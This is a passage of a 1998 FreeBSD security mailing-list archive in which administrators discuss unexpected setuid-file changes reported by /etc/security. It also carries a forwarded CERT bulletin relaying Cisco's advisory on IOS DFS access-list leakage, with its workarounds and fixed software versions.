Received: from easeway.com (ns1.easeway.com [209.69.71.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA28479 for ; Fri, 6 Nov 1998 05:18:00 -0800 (PST) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.7/8.8.5) id HAA22049 for freebsd-security@freebsd.org; Fri, 6 Nov 1998 07:58:31 -0500 (EST) Message-Id: <199811061258.HAA22049@easeway.com> Subject: *huge* setuid diffs To: freebsd-security@FreeBSD.ORG Date: Fri, 6 Nov 1998 07:58:31 -0500 (EST) From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Folks, I just got /etc/security mail from two 2.2.6 servers I administer. The setuid diffs list every setuid program on the server as having been removed and replaced. We haven't done a make world. We haven't touched much of anything. Is this normal, or should I be worried? Both are running a very recent apache 1.2, sshd, ftpd. One is running apache-SSL, the other runs named and Merit radiusd. Thanks, Michael -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 06:18:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA03774 for freebsd-security-outgoing; Fri, 6 Nov 1998 06:18:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from enterprise.sl.ru (enterprise.sl.ru [195.16.101.4] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA03766 for ; Fri, 6 Nov 1998 06:18:17 -0800 (PST) (envelope-from tarkhil@synchroline.ru) Received: from enterprise.sl.ru (tarkhil@localhost.synchroline.ru [127.0.0.1]) by enterprise.sl.ru (8.9.1a/8.8.8) with ESMTP id RAA01848; Fri, 6 Nov 1998 17:19:14 +0300 (MSK) (envelope-from tarkhil@enterprise.sl.ru) Message-Id: <199811061419.RAA01848@enterprise.sl.ru> X-Mailer: exmh version 2.0.2 2/24/98 To: mwlucas@exceptionet.com cc: freebsd-security@FreeBSD.ORG Subject: Re: *huge* setuid diffs In-reply-to: Your message "Fri, 06 Nov 1998 07:58:31 EST." <199811061258.HAA22049@easeway.com> Reply-To: tarkhil@synchroline.ru X-URL: http://freebsd.svib.ru Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Nov 1998 17:19:13 +0300 From: "Alexander B. Povolotsky" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org <199811061258.HAA22049@easeway.com>mwlucas@exceptionet.com writes: >I just got /etc/security mail from two 2.2.6 servers I administer. The >setuid diffs list every setuid program on the server as having been removed >and replaced. > >We haven't done a make world. We haven't touched much of anything. > >Is this normal, or should I be worried? *IMMEDIATLY* shut down both server and do not bring them to Internet until you'll found the reason. It is *QUITE* abnormal. I would not call it "exploit", but it is something to understand at once. Alex. -- Alexander B. Povolotsky, System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 07:04:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA08427 for freebsd-security-outgoing; Fri, 6 Nov 1998 07:04:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA08422 for ; Fri, 6 Nov 1998 07:04:53 -0800 (PST) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id SAA01742; Fri, 6 Nov 1998 18:04:30 +0300 (MSK) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA28772; Fri, 6 Nov 1998 18:04:31 +0300 (MSK) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 6 Nov 1998 18:04:00 +0300 Received: from undisclosed-intranet-sender id xma015064; Fri, 6 Nov 98 18:03:52 +0300 Date: Fri, 6 Nov 1998 18:08:51 +0300 Message-Id: <199811061508.SAA18398@paranoid.eltex.spb.ru> In-Reply-To: <199811061258.HAA22049@easeway.com> from "mwlucas@exceptionet.com" Organization: "Klingon Imperial Intelligence Service" Subject: Re: *huge* setuid diffs To: mwlucas@exceptionet.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Check out if you have /var fs out of space. If yes, script can not create one of files required for diff and you get this kind of diagnostic. mwlucas@exceptionet.com said : > Folks, > > I just got /etc/security mail from two 2.2.6 servers I administer. The > setuid diffs list every setuid program on the server as having been removed > and replaced. > > We haven't done a make world. We haven't touched much of anything. > > Is this normal, or should I be worried? > > Both are running a very recent apache 1.2, sshd, ftpd. One is running > apache-SSL, the other runs named and Merit radiusd. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNkMRAaH/mIJW9LeBAQF+JQQApcLUWK/BRjTPw6uuip12+UuTRwNkYWNt oFlad48Vgw15MXELoVWnSdambA/K4p3zoZ5a7pkG2RTFn2wHBn4MVXTMRgjdpBmK eLg/6De5YhO+0rsz0HXaB56M5STDWG6jf3DKOL8w3A/3sa4sN7ljSvJrT+66DPKl T0Mi1iV0b14= =JGDq -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 07:25:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA10452 for freebsd-security-outgoing; Fri, 6 Nov 1998 07:25:26 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA10401 for ; Fri, 6 Nov 1998 07:24:52 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br ([200.255.48.220]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id IAA16344; Fri, 6 Nov 1998 08:55:45 -0200 (EDT) Message-ID: <3642D460.9205ECA2@agoractvm.com.br> Date: Fri, 06 Nov 1998 08:50:08 -0200 From: =?iso-8859-1?Q?Teleinform=E1tica?= Reply-To: agora@uol.com.br Organization: =?iso-8859-1?Q?=C1GORA?= C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Best of Security CC: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" , FreeBSD Security Subject: [Fwd: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS] Content-Type: multipart/mixed; boundary="------------0186BA0232239141243EBA9A" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------0186BA0232239141243EBA9A Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Regards, _______________________ | Nelson 'Stderr' Brito |_________________________________ |_________________________________________________________| |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | | E-mail: | nelson@cyberspace.org | | URL: | http://www.angelfire.com/sd/stderr | | Public key: | See the URL | |______________|__________________________________________| |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ --------------0186BA0232239141243EBA9A Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Fri Nov 6 08:39:33 1998) X-From_: root Fri Nov 6 03:25:42 1998 Received: from coal.cert.org (coal.cert.org [192.88.210.31]) by pascal.uol.com.br (8.9.1/8.9.1) with SMTP id DAA23159; Fri, 6 Nov 1998 03:25:23 -0200 (EDT) Received: (from cert-advisory@localhost) by coal.cert.org (8.6.12/CERT) id QAA25000 for cert-advisory-queue-4; Thu, 5 Nov 1998 16:14:16 -0500 Date: Thu, 5 Nov 1998 16:14:16 -0500 Message-Id: <199811052114.QAA25000@coal.cert.org> From: CERT Bulletin To: cert-advisory@coal.cert.org Subject: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS Reply-To: cert-advisory-request@cert.org Organization: CERT(sm) Coordination Center - +1 412-268-7090 X-Mozilla-Status2: 00000000 -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= CERT* Vendor-Initiated Bulletin VB-98.13 November 5, 1998 Topic: Cisco IOS DFS Access List Leakage Source: Cisco To aid in the wide distribution of essential security information, the CERT Coordination Center is forwarding the following information from Cisco. Cisco urges you to act on this information as soon as possible. Cisco contact information is included in the forwarded text below; please contact them if you have any questions or need further information. =======================FORWARDED TEXT STARTS HERE============================ - -----BEGIN PGP SIGNED MESSAGE----- Field Notice: Cisco IOS DFS Access List Leakage ================================================================= Revision 1.2 For release 08:00 AM US/Pacific, Thursday, November 5, 1998 Cisco internal use only until release date. Summary ======= Errors in certain Cisco IOS software versions for certain routers can cause IP datagrams to be output to network interfaces even though access lists have been applied to filter those datagrams. This applies to routers from the Cisco 7xxx family only, and only when those routers have been configured for distributed fast switching (DFS). There are two independent vulnerabilities, which have been given Cisco bug IDs CSCdk35564 and CSCdk43862. Each vulnerability affects only a specialized subset of DFS configurations. Affected configurations are not believed to be extremely common, but neither are they extremely rare. More details of affected configurations are in the "Who is Affected" section of this document. These vulnerabilities may permit users to send packets to parts of the customer's network for which they are not authorized. This may permit unauthorized access or other attacks on customer computer systems or data. Cisco does not know of any incidents in which these vulnerabilities have actually been exploited by attackers. Neither vulnerability affects any Cisco product other than routers in the 70xx, 72xx or 75xx series. Of 70xx routers, only routers with the optional route-switch processor (RSP) card are affected. Additional configuration conditions apply. Who is Affected =============== These vulnerabilities apply only to the Cisco 7xxx router family. The Cisco 7xxx family are large, rack-mounted backbone routers used primarily by Internet service providers and in large enterprise networks. Cisco 75xx routers are affected by both vulnerabilities. Cisco 72xx routers are affected only by CSCdk35564, and not by CSCdk43862. Cisco 70xx routers are affected only if they have RSP cards installed. Although each of the vulnerabilities is different and manifests itself under different conditions, both involve DFS. DFS is not enabled by default in any Cisco product, and must be manually configured. If the command ip route-cache distributed does not appear in your router configuration file, then you are not affected by either vulnerability. Specifically, process switching (no ip route-cache), ordinary fast switching (ip route-cache), optimum switching (ip route-cache optimum), and CEF or dCEF switching (ip route-cache cef, ip cef distributed switch) are not affected. Flow switching is considered a form of fast switching, and is affected only in distributed mode. Interactions between flow switching and access lists reduce, but do not eliminate, the impact of both vulnerabilities when flow switching is enabled along with DFS. CSCdk35564 affected configurations - - -------------------------------- CSCdk35564 is a defect in the 11.1CC and 11.1CT releases. Routers running Cisco IOS software versions other than 11.1CC and 11.1CT are not affected by CSCdk35564. Cisco 72xx and 75xx routers are affected; Cisco 70xx routers are not supported with the affected hardware/software combinations. To be affected by CSCdk35564, your router must be configured to switch traffic from an interface with DFS enabled to an interface without DFS enabled. This most commonly happens when routers contain both versatile interface processor (VIP) interface cards and non-VIP interface cards. Since DFS is supported only on VIP interfaces, traffic from a VIP to a non-VIP interface may be going from DFS to non-DFS. If DFS is enabled on all of the interfaces in your router, then you are not affected by CSCdk35564. If DFS is not enabled on any interface in your router, then you are not affected. If you do not use the ip access-group command to filter outgoing traffic on any non-DFS interfaces, then you are not affected. CSCdk43862 affected configurations - - -------------------------------- CSCdk43862 affects 11.1, 11.2, and 11.3 versions of Cisco IOS software on the Cisco 70xx and 75xx series; see the table later in this document for details. The Cisco 72xx series is not affected by CSCdk43862, regardless of the software version in use. To be vulnerable, your router must be configured to switch traffic from an input interface with DFS enabled to a logical subinterface of a physical output interface. The output interface may or may not have DFS enabled; the important question for the output interface is whether or not subinterfaces are in use, and whether or not output traffic to subinterfaces is being filtered. Subinterfaces are pseudo-interfaces associated with subsets of the traffic on physical interfaces. For instance, a physical Frame Relay interface might have a subinterface associated with each Frame Relay PVC. Subinterfaces do not exist by default; they are created as part of user configuration. Subinterface numbers always contain periods, as in "Serial 0/1.1". If your configuration file does not contain any such "dotted" interface numbers, then you are not vulnerable. If you do not use the ip access-group command to apply output access-list filtering to subinterfaces, then you are not vulnerable. CSCdk43862 causes the access list applied to one subinterface on a physical interface to be incorrectly used for traffic destined for a different subinterface. If you use the same access list to filter outbound traffic on all subinterfaces of any given physical interface, then you are not vulnerable. Impact ====== Incorrect access-list filtering may be applied to output packets. Output access lists are frequently used to implement security filtering, and the failure of such access lists may permit users to send packets to parts of the network for which they are not authorized. This, in turn, may permit them to bypass security restrictions, and to gain access to data or resources from which they should be excluded. Neither of the defects described in this notice "fails reliably". The same access lists, on the same interfaces, may work correctly at some times, and fail at other times. Because of this, administrators who test their access lists may be misled into believing that the access lists are providing effective protection, when in fact they are not. CSCdk43862 may result in legitimate traffic being filtered out, as well as in undesired traffic being permitted to pass through the router. CSCdk35564 never filters legitimate traffic; it only permits undesired traffic. An attacker who had detailed knowledge of these vulnerabilities might be able to create conditions favorable to unauthorized access being permitted. However, such activity would probably be unnecessary; even without deliberate intervention by an attacker, such conditions would be expected to occur frequently during the operation of most affected networks. Workarounds =========== These vulnerabilities can be worked around by disabling DFS on network interfaces (with no ip route-cache distributed). Be aware that the purpose of DFS is to transfer computational load from the router's primary CPU to the CPUs on the VIP cards, and that disabling DFS may therefore cause overload of the primary CPU. Evaluate your traffic load and CPU usage before using this workaround. If all interfaces in the router are DFS-capable, but DFS has for some reason been enabled only on some of the interfaces, it may be possible to work around CSCdk35564 by enabling DFS on all interfaces. This will not affect CSCdk43862. CSCdk43862 can sometimes be worked around by reconfiguring to use the same output access list on all the subinterfaces of a physical interface. Another possible workaround is to redesign the access lists structure on the router to avoid the need for output access lists on affected interfaces. Software Versions and Fixes =========================== CSCdk43862 has a duplicate report, CSCdk43696. The bug ID CSCdk43862 should be used to refer to this defect. The following table summarizes the affected Cisco IOS software versions for both CSCdk35564 and CSCdk43862, and indicates which versions have been fixed. To use the table, look up the software release you're currently running (available from the show version command on your router) in the first column of the table. The other columns of the table tell you which Cisco IOS software versions from your major release have been fixed, and which versions Cisco recommends you install. The table lists both interim versions and regular released versions. Interim versions receive far less testing, and are generally of less certain quality, than regular released versions. Cisco recommends installing regular released software whenever possible. Interim versions are listed for reference, and for the convenience of customers who must upgrade before appropriate regular released versions are available. As always, a fix applied to one regular released version in a major release means that all later versions of that major release are also fixed. For instance, 11.2(17) is fixed, so 11.2(18) and later are also fixed. The table is designed to cover all supported software on all affected Cisco routers. If you are running distributed fast switching on a 72xx router, a 75xx router, or a 70xx router with an RSP processor, and you are using an 11.1, 11.2, or 11.3 release not listed in the table, please contact the Cisco TAC for assistance. +----------+-------------+-----------+-------------+------------+-------------+ |Cisco IOS |Initial CSCdk35564 Fixes |Initial CSCdk43862 Fixes |Upgrade Path | |Major | | |for 7xxx DFS | |Release |Interim |Regular |Interim |Regular |Users | |(only |(minimal |(dates are |(minimal |(dates are | | |7xxx |testing; |subject to |testing; |subject to | | |releases |urgent |change) |urgent |change) | | |are |upgrades | |updates | | | |listed) |only) | |only) | | | +==========+=============+===========+=============+============+=============+ |11.0 and |Unaffected |Unaffected |Unaffected |Unaffected |Unaffected | |earlier, | | | | | | |all | | | | | | |variants | | | | | | +----------+-------------+-----------+-------------+------------+-------------+ |11.1 |Unaffected |Unaffected | - | - |Go to 11.1CA | +----------+-------------+-----------+-------------+------------+-------------+ |11.1CA |Unaffected |Unaffected |11.1(22)CA |11.1(22)CA |11.1(22)CA or| |(core ED) | | | | |later | +----------+-------------+-----------+-------------+------------+-------------+ |11.1CC |11.1(21.2)CC |11.1(21)CC1|11.1(21.2)CC |11.1(21)CC1 |11.1(21)CC1, | |(CEF ED) | |11.1(22)CC | |11.1(22)CC |11.1(22)CC or| | | | | | |later | +----------+-------------+-----------+-------------+------------+-------------+ |11.1CT |11.1(21.2)CT |11.1(22)CT |11.1(21.2)CT |11.1(22)CT |11.1(22)CT or| |(tag | | | | |later | |switch | | | | | | |ED) | | | | | | +----------+-------------+-----------+-------------+------------+-------------+ |11.2 |Unaffected |Unaffected |11.2(16.1) |11.2(17), |11.2(17) or | | | | | |planned |later; | | | | | |Jan-1999 |11.2(16.1) or| | | | | | |11.3 if | | | | | | |11.2(17) | | | | | | |schedule | | | | | | |unacceptable | +----------+-------------+-----------+-------------+------------+-------------+ |11.2F |Unaffected |Unaffected | - | - |Go to 11.3 | +----------+-------------+-----------+-------------+------------+-------------+ |11.2P |Unaffected |Unaffected |11.2(16.1)P |11.2(17)P, |11.2(17)P or | |(platform | | | |planned |later; | |ED) | | | |Jan-1999 |11.2(16.1)P or | | | | | |11.3 if | | | | | | |11.2(17)P | | | | | | |schedule | | | | | | |unacceptable.| +----------+-------------+-----------+-------------+------------+-------------+ |11.2BC |Unaffected |Unaffected |11.2(16.1)BC |11.2(17)BC, |11.2(17)BC or| |(CIP ED) | | | |planned |later; | | | | | |Jan-1999 |11.2(16.1)BC | | | | | | |if 11.2(17)BC| | | | | | |schedule | | | | | | |unacceptable.| +----------+-------------+-----------+-------------+------------+-------------+ |11.3 |Unaffected |Unaffected |11.3(6.2) |11.3(7), |11.3(7) or | | | | | |planned |later | | | | | |Nov-1998 | | +----------+-------------+-----------+-------------+------------+-------------+ |11.3T |Unaffected |Unaffected |11.3(6.2)T |11.3(7)T, |11.3(7)T or | | | | | |planned |later | | | | | |Nov-1998 | | +----------+-------------+-----------+-------------+------------+-------------+ |11.3NA |Unaffected |Unaffected |11.3(6.2)NA |11.3(7)NA, |11.3(7)NA or | |(voice | | | |Planned |later; | |ED) | | | |Dec-1998 |11.3(6.2)NA if | | | | | |11.3(7)NA | | | | | | |schedule | | | | | | |unacceptable.| +----------+-------------+-----------+-------------+------------+-------------+ |11.3(2)XA |Unaffected |Unaffected | - | - |11.3(7) or | | | | | | |later | +----------+-------------+-----------+-------------+------------+-------------+ |12.0(1) |Unaffected |Unaffected |Unaffected |Unaffected |Unaffected | |and | | | | | | |later, | | | | | | |all | | | | | | |variants | | | | | | +----------+-------------+-----------+-------------+------------+-------------+ Because of restricted port adapter support, Cisco does not believe that many, if any, customers are using DFS with 11.1 mainline software. 11.1CA is recommended for both functionality and stability reasons. The 11.1(21)CC1 release is a special release of 11.1CC; the 11.1CC release sequence runs from 11.1(21)CC through 11.1(21)CC1, then to 11.1(22)CC. 11.3(2)XA was a special one-time release based on 11.3(2). The functionality of 11.3(2)XA was carried into the 11.3(3) release. Getting Fixed Software - - -------------------- Cisco is offering free software updates to correct these defects for all vulnerable customers, regardless of contract status. As with any software change, you should check to make sure that your hardware can support the new software before installing it. The most common problem is inadequate RAM. While this is seldom a problem when upgrading within a major release (say, from 11.2(11)P to 11.2(17)P), it is often an issue when upgrading between major releases (say, from 11.2(11)P to 11.3(7)T). Further assistance is available on Cisco's Worldwide Web site at http://www.cisco.com. Customers with service contracts should obtain new software through their regular update channels (generally via Cisco's Worldwide Web site). Customers with service contracts may upgrade to any software release, but must, as always, remain within the boundaries of the feature sets they have purchased. Cisco does not recommend upgrading to a new major release without careful planning. Customers without service contracts may upgrade only to obtain the bug fixes; they are not offered upgrades to versions newer than required to resolve the defects. In general, customers without service contracts will be restricted to upgrading within a single row of the table above. Customers without service contracts should get their updates by contacting the Cisco TAC. TAC contacts are as follows: * +1 800 553 2447 (toll-free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * tac@cisco.com Give the URL of this notice as evidence of your entitlement to a free update. Free updates for non-contract customers must be requested through the TAC. Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software updates. Exploitation and Public Announcements ===================================== Cisco knows of no public announcements or discussion of these vulnerabilities prior to the date of this notice. CSCdk35564 was found by a Cisco customer during installed-system testing. CSCdk43862 was found by Cisco during internal testing. Because of the nature of these vulnerabilities, attackers would rarely be expected to exploit them directly. In most cases, attackers would simply find themselves with access to network resources to which administrators thought they had denied access. Cisco has had no actual reports of malicious attacks succeeding because of this vulnerability, nor of anyone deliberately trying to create "vulnerable" conditions. Status of This Notice ===================== This is a final field notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this notice unless there is some material change in the facts. Should there be a significant change in the facts, Cisco may update this notice. Distribution - - ---------- This notice will be posted on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/770/iosdfsacl-pub.shtml . In addition to Worldwide Web posting, the initial version of this notice is being sent to the following e-mail and Usenet news recipients: * cust-security-announce@cisco.com * bugtraq@netspace.org * first-teams@first.org (includes CERT/CC) * first-info@first.org * cisco@spot.colorado.edu * comp.dcom.sys.cisco * nanog@merit.edu * Various internal Cisco mailing list Future updates of this notice, if any, will be placed on Cisco's Worldwide Web server, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL given above for any updates. Revision History - - -------------- Revision 1.0, 00:12 US/Pacific, First public release candidate version. 2-NOV-1998 Revision 1.1, 20:08 US/Pacific, Cosmetic edits. 2-NOV-1998 Revision 1.2, 08:55 US/Pacific, More cosmetic edits. 3-NOV-1998 Cisco Security Procedures ========================= Please report security issues with Cisco products, and/or sensitive security intrusion emergencies involving Cisco products, to security-alert@cisco.com . Reports may be encrypted using PGP; public RSA and DSS keys for "security-alert@cisco.com" are on the public PGP keyservers. The alias "security-alert@cisco.com" is used only for reports incoming to Cisco. Mail sent to the list goes only to a very small group of users within Cisco. Neither outside users nor unauthorized Cisco employees may subscribe to "security-alert@cisco.com". Please do not use "security-alert@cisco.com" for configuration questions, for security intrusions that you do not consider to be sensitive emergencies, or for general, non-security-related support requests. We do not have the capacity to handle such requests through this channel, and will refer them to the TAC, delaying response to your questions. We advise contacting the TAC directly with these requests. TAC contact numbers are as follows: * +1 800 553 2447 (toll-free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * tac@cisco.com All formal public security notices generated by Cisco are sent to the public mailing list "cust-security-announce@cisco.com". For information on subscribing to this mailing list, send a message containing the single line "info cust-security-announce" to "majordomo@cisco.com". An analogous list, "cust-security-discuss@cisco.com" is available for public discussion of the notices and of other Cisco security issues. Press contacts - - ------------ Press inquiries regarding Cisco security notices should be directed to Doug Wills, dwills@cisco.com, +1 408 527 9475. ================================================================= This notice is copyright 1998 by Cisco Systems, Inc. This notice may be redistributed freely after the release date given at the top of the text, provided that redistributed copies are complete and unmodified, including this copyright notice and all date and version information. ================================================================= - -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBNkHFQ3LSeEveylnrAQHzdQgAsEDgjf6wOFohQVg7aXGrSWc8oPFY8HM5 nqRMY7q2YkRYn7B8Pt1PqqsigxanQm3lN2Ke8fMvZQUpwnHjm1ajR9AGlvvViGgq fPnzdGQNtZkq5aAvoBxZ7ZMhDTu++AJLBnxHtfG4Kl34bTWHZiHdoxY43Zanq4nL fsxft+RSR54ja2mSo23DwGkMYjxcXV2RyuZtKEe5dqpeGbeNe0pv+d5SgpGuL+PB +GZavuSdyafelQa7FGLIcJwxzE0ANRkBY+UHksyJme5uBRsP9gQFahE/rR6d1p/V kBClFpvmPKBQOPjiYD9iaUUb6tAkcLvctyHwPKo/H7E605LazBruFQ== =og6M - -----END PGP SIGNATURE----- ========================FORWARDED TEXT ENDS HERE============================= If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (FIRST). See http://www.first.org/team-info/. We strongly urge you to encrypt any sensitive information you send by email. The CERT Coordination Center can support a shared DES key and PGP. Contact the CERT staff for more information. Location of CERT PGP key ftp://ftp.cert.org/pub/CERT_PGP.key CERT Contact Information - ------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA CERT publications, information about FIRST representatives, and other security-related information are available from http://www.cert.org/ ftp://ftp.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce To be added to our mailing list for CERT advisories and bulletins, send your email address to cert-advisory-request@cert.org In the subject line, type SUBSCRIBE your-email-address ========================================================================== * Registered U.S. Patent and Trademark Office. The CERT Coordination Center is part of the Software Engineering Institute (SEI). The SEI is sponsored by the U. S. Department of Defense. NO WARRANTY ANY MATERIAL FURNISHED BY CARNEGIE MELLON UNIVERSITY AND THE SOFTWARE ENGINEERING INSTITUTE IS FURNISHED ON AN "AS IS" BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT. ========================================================================== This file: ftp://ftp.cert.org/pub/cert_bulletins/VB-98.13.Cisco_IOS_DFS -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNkH+CnVP+x0t4w7BAQFCsAQAux7Pm1EFKuLuix93B29TUpZ5lrcHWvPq oVwOZbTFfSWUFGdiZ1g9L+DOTgygDcrY38IhoxkVto6cYiI6SSrULqiuahXUyG5J BnqPefk8RNVhYK1cx3Ys9/AeqQwZ6pe3WsE4GCOcE9p0zOYHs4p8NwtxMosOPjLM 3LM+BYgZlJI= =4hxk -----END PGP SIGNATURE----- --------------0186BA0232239141243EBA9A-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 07:34:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA11719 for freebsd-security-outgoing; Fri, 6 Nov 1998 07:34:55 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from www.scancall.no (www.scancall.no [195.139.183.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA11714 for ; Fri, 6 Nov 1998 07:34:53 -0800 (PST) (envelope-from Marius.Bendiksen@scancall.no) Received: from super2.langesund.scancall.no [195.139.183.29] by www with smtp id JTDFQAXJ; Fri, 06 Nov 98 15:34:39 GMT (PowerWeb version 4.04r6) Message-Id: <3.0.5.32.19981106163438.0099ad90@mail.scancall.no> X-Sender: Marius@mail.scancall.no X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Fri, 06 Nov 1998 16:34:38 +0100 To: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG From: Marius Bendiksen Subject: Re: *huge* setuid diffs In-Reply-To: <199811061258.HAA22049@easeway.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm no expert, but I'd indeed be worried. --- Marius Bendiksen, IT-Trainee, ScanCall AS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 08:23:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA19160 for freebsd-security-outgoing; Fri, 6 Nov 1998 08:23:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA19153 for ; Fri, 6 Nov 1998 08:22:59 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id JAA09910; Fri, 6 Nov 1998 09:21:11 -0700 (MST) Message-Id: <4.1.19981106091836.04eb61b0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Fri, 06 Nov 1998 09:21:03 -0700 To: tarkhil@synchroline.ru, mwlucas@exceptionet.com From: Brett Glass Subject: Re: *huge* setuid diffs Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This might be a breakin, but it also might be due to the VM bug that changes file mod dates. (We went to red alert over that one before we found out about it.) This bug shouldn't be allowed to persist, as it causes problems with tripwire, etc. --Brett At 05:19 PM 11/6/98 +0300, Alexander B. Povolotsky wrote: > <199811061258.HAA22049@easeway.com>mwlucas@exceptionet.com writes: >>I just got /etc/security mail from two 2.2.6 servers I administer. The >>setuid diffs list every setuid program on the server as having been removed >>and replaced. >> >>We haven't done a make world. We 